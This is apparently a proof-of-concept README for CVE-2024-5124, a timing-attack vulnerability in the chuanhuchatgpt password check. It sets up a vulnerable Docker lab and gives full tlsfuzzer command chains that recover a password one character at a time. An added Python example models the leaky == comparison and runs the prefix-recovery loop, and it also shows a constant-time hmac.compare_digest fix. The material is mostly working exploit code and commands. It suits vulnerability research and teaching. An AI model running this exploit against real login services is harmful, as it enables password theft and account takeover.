
CVE-2024-5124 PoC — Timing Attack Vulnerability in gaizhenbiao/chuanhuchatgpt

Associated Vulnerability

Title: Timing Attack Vulnerability in gaizhenbiao/chuanhuchatgpt (CVE-2024-5124)

Description: A timing attack vulnerability exists in the gaizhenbiao/chuanhuchatgpt repository, specifically within the password comparison logic. The vulnerability is present in version 20240310 of the software, where passwords are compared using the `==` operator in Python. That comparison stops at the first mismatching character, so an attacker can infer the password one character at a time from how long each comparison takes. The issue arises in the code that checks the password for a given username and leads to the exposure of sensitive information to an unauthorized actor: an attacker exploiting it could guess user passwords and compromise the system.

Readme
# Deploy victim server

# Install Docker

```bash
# Install packages required for the installation
sudo apt-get update
sudo apt-get install --yes ca-certificates curl

# Add Docker's official GPG key to the keyring directory
sudo install -m 0755 -d /etc/apt/keyrings
sudo curl -fsSL https://download.docker.com/linux/debian/gpg -o /etc/apt/keyrings/docker.asc
sudo chmod a+r /etc/apt/keyrings/docker.asc

# Add the repository to Apt sources (the codename is read from /etc/os-release, so this works on any current Debian release)
echo \
  "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/debian \
  $(. /etc/os-release && echo "$VERSION_CODENAME") stable" | \
  sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt-get update

# Install Docker packages
sudo apt-get install --yes docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin
```

# Run victim server

```bash
# One test account: username "openai", password "isCloseAi" (this is the password the exploit recovers)
export JSON='{
    "users": [["openai", "isCloseAi"]]
}'
# Run the vulnerable image tag (20240310). No host port is published: the sed flips gradio to
# share=True, so the app is reached through the public share link printed in the log.
sudo docker run -e language=en_US -it tuchuanhuhuhu/chuanhuchatgpt:20240310 /bin/bash -c "apt update && apt install --yes git && pip install itsdangerous gradio && echo '${JSON}' > config.json && sed -i 's/share=share/share=True/g' ChuanhuChatbot.py && python3 -u ChuanhuChatbot.py 2>&1 | tee /var/log/application.log"
```


# Deploy exploit

# I Install tlsfuzzer

```bash
sudo apt install --yes virtualenv
# The run commands below expect the virtualenv at ./tlsfuzz-venv
virtualenv -p python3 tlsfuzz-venv
source tlsfuzz-venv/bin/activate
pip install --pre tlslite-ng
git clone https://github.com/tlsfuzzer/tlsfuzzer
# extract.py and analysis.py need tlsfuzzer's timing-analysis dependencies (numpy, scipy, pandas, matplotlib, ...)
pip install -r tlsfuzzer/requirements-timing.txt
```

# II Run exploit

Always pass `--clock-frequency 1000` to `extract.py`. The raw times that `main.py` writes to `out.csv` are fixed-unit timestamps, not CPU cycle counts, so there is no need to look up your CPU clock (for example with `watch -n 1 "cat /proc/cpuinfo | grep 'MHz'"`) the way you would for a cycle-counter capture.

lowercase:

```bash
# rm -rf so a missing tmpdir/ does not abort the chain before mkdir
rm -rf tmpdir/ && mkdir tmpdir/ &&
python3 CVE-2024-5124/main.py -r 10000 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z "out.csv" &&
PYTHONPATH=tlsfuzzer ./tlsfuzz-venv/bin/python ./CVE-2024-5124/step2like.py -r 1000 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z -o ./tmpdir/ &&
PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/extract.py --raw-times out.csv -o ./tmpdir/ --clock-frequency 1000 -l ./tmpdir/log.csv &&
PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/analysis.py -o tmpdir/ --verbose
```

uppercase:

```bash
rm -rf tmpdir/ && mkdir tmpdir/ &&
python3 CVE-2024-5124/main.py -r 100 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z -c A -c B -c C -c D -c E -c F -c G -c H -c I -c J -c K -c L -c M -c N -c O -c P -c Q -c R -c S -c T -c U -c V -c W -c X -c Y -c Z "out.csv" &&
PYTHONPATH=tlsfuzzer ./tlsfuzz-venv/bin/python ./CVE-2024-5124/step2like.py -r 100 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z -c A -c B -c C -c D -c E -c F -c G -c H -c I -c J -c K -c L -c M -c N -c O -c P -c Q -c R -c S -c T -c U -c V -c W -c X -c Y -c Z -o ./tmpdir/ &&
PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/extract.py --raw-times out.csv -o ./tmpdir/ --clock-frequency 1000 -l ./tmpdir/log.csv &&
PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/analysis.py -o tmpdir/ --verbose
```


full (as shipped this run uses the same letters-only character set as the uppercase run; append further `-c` options to both scripts to cover digits or symbols):

```bash
rm -rf tmpdir/ && mkdir tmpdir/ &&
python3 CVE-2024-5124/main.py -r 100 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z -c A -c B -c C -c D -c E -c F -c G -c H -c I -c J -c K -c L -c M -c N -c O -c P -c Q -c R -c S -c T -c U -c V -c W -c X -c Y -c Z "out.csv" &&
PYTHONPATH=tlsfuzzer ./tlsfuzz-venv/bin/python ./CVE-2024-5124/step2like.py -r 100 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z -c A -c B -c C -c D -c E -c F -c G -c H -c I -c J -c K -c L -c M -c N -c O -c P -c Q -c R -c S -c T -c U -c V -c W -c X -c Y -c Z -o ./tmpdir/ &&
# --clock-frequency stays 1000 here as well (the raw times are timestamps, not CPU cycles)
PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/extract.py --raw-times out.csv -o ./tmpdir/ --clock-frequency 1000 -l ./tmpdir/log.csv &&
PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/analysis.py -o tmpdir/ --verbose
```

The guessed character is the one with the highest value in `./tmpdir/box_plot.png`: the longer the matching prefix, the more of the string CPython's `==` compares before it stops, so the correct candidate is the slowest one. Two caveats when reading the plot: CPython compares the lengths of the two strings before looking at any character, so a guess of the wrong length returns immediately and shows no per-character signal; and at the final position every candidate is compared to the end, so there the right guess is recognized by the login succeeding rather than by its timing.
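The prefix-at-a-time recovery that the box-plot ranking drives, and the leak in the `==` check it relies on, as an added example that is not part of the PoC scripts or of the chuanhuchatgpt code base. It models CPython's string `==` deterministically (a count of compared characters stands in for response time, so it runs offline without tlsfuzzer), runs the recovery loop against that model for the README's `openai`/`isCloseAi` credentials (constructed here from the config.json above), and shows the `hmac.compare_digest` check that removes the leak. `leaky_equals`, `recover_length`, `recover_password`, `check_password_vulnerable`, `check_password_fixed` and `run_attack` are names of this example, not of the project.

```python
"""Added example, not code from the chuanhuchatgpt project or from the PoC scripts:
a deterministic model of the per-character leak in a Python `==` password check,
the prefix-recovery loop that exploits it, and the constant-time check that closes it."""
import hmac
import string
from typing import Callable, Tuple

# Constructed credentials mirroring the PoC's config.json entry ["openai", "isCloseAi"].
USERS = {"openai": "isCloseAi"}

Oracle = Callable[[str], Tuple[bool, int]]


def leaky_equals(candidate: str, secret: str) -> Tuple[bool, int]:
    """Model of what CPython does for `candidate == secret` on str: compare lengths first,
    then walk the characters and stop at the first mismatch. Returns (result, work), where
    `work` is the number of character comparisons performed; in the live system that work
    is the response-time difference that tlsfuzzer's extract.py/analysis.py look for."""
    if len(candidate) != len(secret):
        return False, 0          # length mismatch returns before any character is examined
    work = 0
    for a, b in zip(candidate, secret):
        work += 1
        if a != b:
            return False, work   # early exit: one more step for every matching prefix char
    return True, work


def check_password_vulnerable(username: str, password: str) -> bool:
    """The pattern the CVE describes: the submitted password compared to the stored one with `==`."""
    stored = USERS.get(username)
    return stored is not None and password == stored   # timing depends on the matching prefix


def check_password_fixed(username: str, password: str) -> bool:
    """Hardened check: hmac.compare_digest takes time independent of where the inputs differ.
    It still reveals whether the lengths match; comparing fixed-length hashes instead avoids that."""
    stored = USERS.get(username)
    if stored is None:
        # Compare against a dummy so an unknown username costs the same as a known one.
        hmac.compare_digest(password.encode(), b"\0" * len(password))
        return False
    return hmac.compare_digest(password.encode(), stored.encode())


def recover_length(oracle: Oracle, max_len: int = 64) -> int:
    """Because the length check comes first, only a correct-length guess does any character
    work at all. Probe lengths until the oracle reports work > 0 (or an outright match)."""
    for n in range(1, max_len + 1):
        ok, work = oracle("\0" * n)
        if ok or work > 0:
            return n
    raise ValueError("no length up to max_len produced measurable work")


def recover_password(oracle: Oracle, length: int, alphabet: str) -> str:
    """Recover one position at a time: the guess with the most work (longest response time)
    holds the correct character, since the comparison only advances past a match. On the
    last position all guesses cost the same, so the match is detected by the oracle saying True."""
    known = ""
    for pos in range(length):
        best_char, best_work = "", -1
        for c in alphabet:
            guess = known + c + "\0" * (length - pos - 1)   # pad to the right length
            ok, work = oracle(guess)
            if ok:
                return guess
            if work > best_work:
                best_char, best_work = c, work
        known += best_char
    return known


def run_attack(username: str = "openai") -> str:
    """Drive the attack against the leaky model for `username`; returns the recovered password."""
    secret = USERS[username]
    oracle: Oracle = lambda guess: leaky_equals(guess, secret)
    n = recover_length(oracle)
    return recover_password(oracle, n, string.ascii_letters + string.digits)


if __name__ == "__main__":
    print("recovered:", run_attack())
```

Against the live target the `work` counter is replaced by many timed requests per candidate (the `-r` repetitions above) and tlsfuzzer's statistics decide which class is slowest; the loop structure is the same.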
File Snapshot

```
/data/pocs/b96037819b58c46ef1f553213663ac62334da961
├── main.py       (1.0K)
├── README.md     (4.7K)
└── step2like.py  (1.9K)
0 directories, 3 files
```